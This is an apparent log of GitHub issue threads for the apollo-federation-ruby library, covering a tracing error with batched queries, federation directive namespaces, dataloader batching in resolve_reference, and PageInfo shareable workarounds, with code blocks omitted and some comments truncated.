In a Rails app with a controller that supports [query-batching via multiplex](https://graphql-ruby.org/queries/multiplex.html#apollo-query-batching), enabling federated tracing ([using the documented steps](https://github.com/Gusto/apollo-federation-ruby#tracing)) leads to a runtime error when processing batched queries.

#### Repro

Controller action:
[code]

The following requests succeed:
[code

[2022-07-05 06:24] thumbnail opened #201 "unable to configure federation directive namespace"
In federation version 2 the directives have namespaces (`federation__` by default). Currently this prefix is non-configurable which may cause issues when other subgraphs use a different namespace or import them without a namespace.

In Apollo studio I got the following error:

[code]

In this case, A and B are ruby applications, and X and Y are not.

It can be partially fixed by configuring the gr

[2022-07-05 11:57] geshwho commented on #201
Hey @thumbnail, thanks for reporting this! @daemonsy and I will take a look this week.

[2022-07-06 18:34] geshwho commented on #201
Hey @thumbnail, we took a look at this today and it seems like there are a couple of enhancements that would help us get closer to spec compliant with federation version 2.
- We need to provide an option that allows the user to override the default namespace (similar to the example in the [docs](https://www.apollographql.com/docs/federation/federation-spec/#link) which uses `fed2` as the namespace

[2022-07-12 01:20] geshwho commented on #201
Hey @lennyburdette, I was just rereading your comment [here](https://github.com/Gusto/apollo-federation-ruby/pull/196#issuecomment-1139067046) and realized that it directly conflicts with what I just suggested [above](https://github.com/Gusto/apollo-federation-ruby/issues/201#issuecomment-1176546053). Namely, per your comment, code-first libraries will not be providing an API to rename imports (se

[2022-07-12 02:08] lennyburdette commented on #201
Hmm this is odd. It appears to me that this error occurs with `@inaccessible` but not `@key` or `@shareable` so I think this is a bug related to backward-compatibility with `@tag` and `@inaccessible`. I'll reach out to the team tomorrow and get back to you.

https://github.com/apollographql/federation/blob/main/composition-js/src/merging/merge.ts#L198-L201
https://github.com/apollographql/federati

[2022-07-12 19:57] lennyburdette commented on #201
I had a good conversation with my team about this and learned a bunch. I still consider this a bug, but it may not be a high priority to fix. And we'll eventually need an API for configuring future `@link`ed directives, so it's probably worth addressing now.

Here's my summary of the conversation: https://github.com/apollographql/federation/issues/1976#issuecomment-1182131463

[2022-08-09 22:38] kellysutton opened #203 "Find a home for MinimumWageMailer and its templates"

[2022-08-09 22:40] geshwho commented on #203
@kellysutton I think you accidentally created this issue in the wrong repo. (FYI: This is a public repo)

[2022-08-10 20:38] #203 closed

[2022-08-15 10:57] col commented on #149
@daemonsy I've run into this problem today. We are returning `dataloader.with(...).load` as the result of `resolve_reference` but it's calling `fetch` on the data source for each individual reference. I've been scratching my head on this one for hours and I think it's a legitimate issue.
Do you have an example of this working correctly with a data loader?

[2022-08-16 04:53] col commented on #153
@daemonsy You can probably close this now issue now.

[2022-08-16 05:01] col opened #205 "Using a dataloader inside `resolve_reference` does not work"
It's important that when a subgraph service receives an `_entities` query from the gateway that it can resolve all of the references efficiently. You would expect that using a data loader inside the `resolve_reference` method for each entity would achieve this but unfortunately it does not work as expected. Currently the data loader is being invoked for each individual reference rather than as a s

[2022-08-16 17:55] geshwho commented on #205
I'm not quite as well versed on this issue as @daemonsy, but I'll dig into it this week (@daemonsy is currently OOO)

@col Am I correct that this is the same issue (or very similar to) as #149?

[2022-08-17 02:18] col commented on #205
@geshwho Yes you are correct, this is the same issue as #149

[2022-08-17 07:35] daemonsy commented on #205
Hey @col, should have documented the other issue better, a little hazy now. I believe I didn't actually find a direct solution to the problem, it just wasn't a problem anymore on the project that's using it.

Had a window to take a look but couldn't get the example to run. I believe it has something to do with how we map `representations` in `#_entities`

[2022-08-19 16:16] rmosolgo commented on #205
I think this basically boils down the the difference between GraphQL-Batch and Dataloader:

- With GraphQL-Batch, user code would return a `Promise` to GraphQL-Ruby (or an Array of Promises), then GraphQL-Ruby would resolve them at some point
- With Dataloader, `.load(...)` calls actually _pause_ execution until the data is available, then it resumes.

So inside a `.map { ... }` (like [this one](h

[2022-08-20 02:24] col commented on #205
Thanks for your input @rmosolgo!

I've been trying to get this to work using append_job but have been unsuccessful.

Both the approaches you've suggested sound like they'd work.

Option 1 - resolve_references
I think this would be my preferred approach. From the users perspective it's easy for them to reason about. They don't have to understand the implementation for them to work with it. I think

[2022-08-24 06:22] matoni109 opened #207 "passing `@federation__shareable` to type PageInfo"
Hello Everyone 😀,

We are using `type PageInfo` in two `subgraphs` using `federation 2.0`

- Currently we are getting the below error when trying to use `connection_type`
- I've tried passing `shareable: true` also.
- Any ideas ?

[code]
[code]

[code]

[2022-08-24 15:51] abachman commented on #207
We faced this issue too and it was tricky to solve. We ended up monkeypatching `GraphQL::Types::Relay::PageInfo` like this:

[code]

and then requiring that file manually from our `schema.rb` file.

We had additional logic to decide if `shareable` should be called based on what federation version this subgraph was running. We're supporting something like 25 subgraphs, so not all of them could go t

[2022-08-24 21:09] geshwho commented on #207
Hi @matoni109, Thank you for submitting this. I'll take a closer look at it within the next day or so.

[2022-08-25 00:54] matoni109 commented on #207
Thanks @abachman & @geshwho,

If we get something up and running here I'll `paste` it into this thread

[2022-08-30 12:09] geshwho commented on #207
Sorry for the delay.. To me, this _feels_ like something that the library should handle for you since `connection_type` is a graphql-ruby feature. I'm going to chat with some folks and see how we want to handle it.

[2022-08-31 14:12] daemonsy commented on #205
Apologies from the late reply, just returned from a holiday in Singapore :)

Hey @rmosolgo it's been a while, hope you're doing well. Thanks for the clear explanation, that rang a big bell. I've personally bumped into surprises with pausing execution.

@col I'm going to do a spike on the suggestions on our codebase. One consideration is that we've kept to an implicit convention keeping it close to

[2022-08-31 23:27] matoni109 commented on #207
@geshwho our team came up with below in the mean time if that helps anyone else :

[code]

[code]

[2022-08-31 23:52] col commented on #205
Hey @daemonsy, live in Singapore, I could have taken you out for a drink! Maybe next time!

Anyway, I'd still be very happy to see a better solution for this that keeps the original API intact. I had tried a few things but none of the approaches I tried worked.

I'm wondering if it would be better to lazily resolve the references while resolving the the Entity type rather than trying to do it as a

[2022-09-02 17:48] #183 closed

[2022-09-02 18:09] daemonsy commented on #205
Hey @col 😱 definitely my loss. I'm from Singapore but reside in NY with my family. It was good to be back home for a while, despite the weather :)

Do you have an example or pseudo code for how this might look?

[2022-09-13 06:17] smyrick commented on #207
Hello, Shane from Apollo here. I am not familiar with the internals of this library but the original error is an issue where you might be running a combination of Fed 1 + Fed 2 or you are not using Fed 2 with the correct directives.

The short explanation is that in Fed 1 everything was considered "shareable" by default, but in Fed 2 it is now an opt-in model with the new `@shareable` directive.

[2022-09-14 23:54] eliocapelati commented on #207
Hello 👋 ,

We are also having this same problem. We have tested the approaches shared above and still can't find a workaround that works.

I'm commenting here to receive updates from this thread.

[2022-09-15 00:43] matoni109 commented on #207
@eliocapelati we have above working in `staging` happy to work through it if you have a sample repo to play with

[2022-09-15 00:48] matoni109 commented on #207
@geshwho i'm also in the mix of working on a PR of a `fed2` version of the libs **example** which is using `fed1`

[2022-10-13 21:46] skukx commented on #207
May have already pointed out the workaround already. Here is a quick two liner for those curious. (Does the same thing as other solutions posted).
[code]

[2022-10-13 22:01] matoni109 commented on #207
thanks @skukx  :) below for those wondering where to put the fix ( that might have just been me .. )

[code]

[2022-10-13 22:51] skukx commented on #207
You could technically place those lines anywhere. I chose to place it at the top of my `graphql_schema.rb`. You could also place it in an initializer as well.

[2022-10-13 22:57] matoni109 commented on #207
Thanks @skukx I'll put them there :)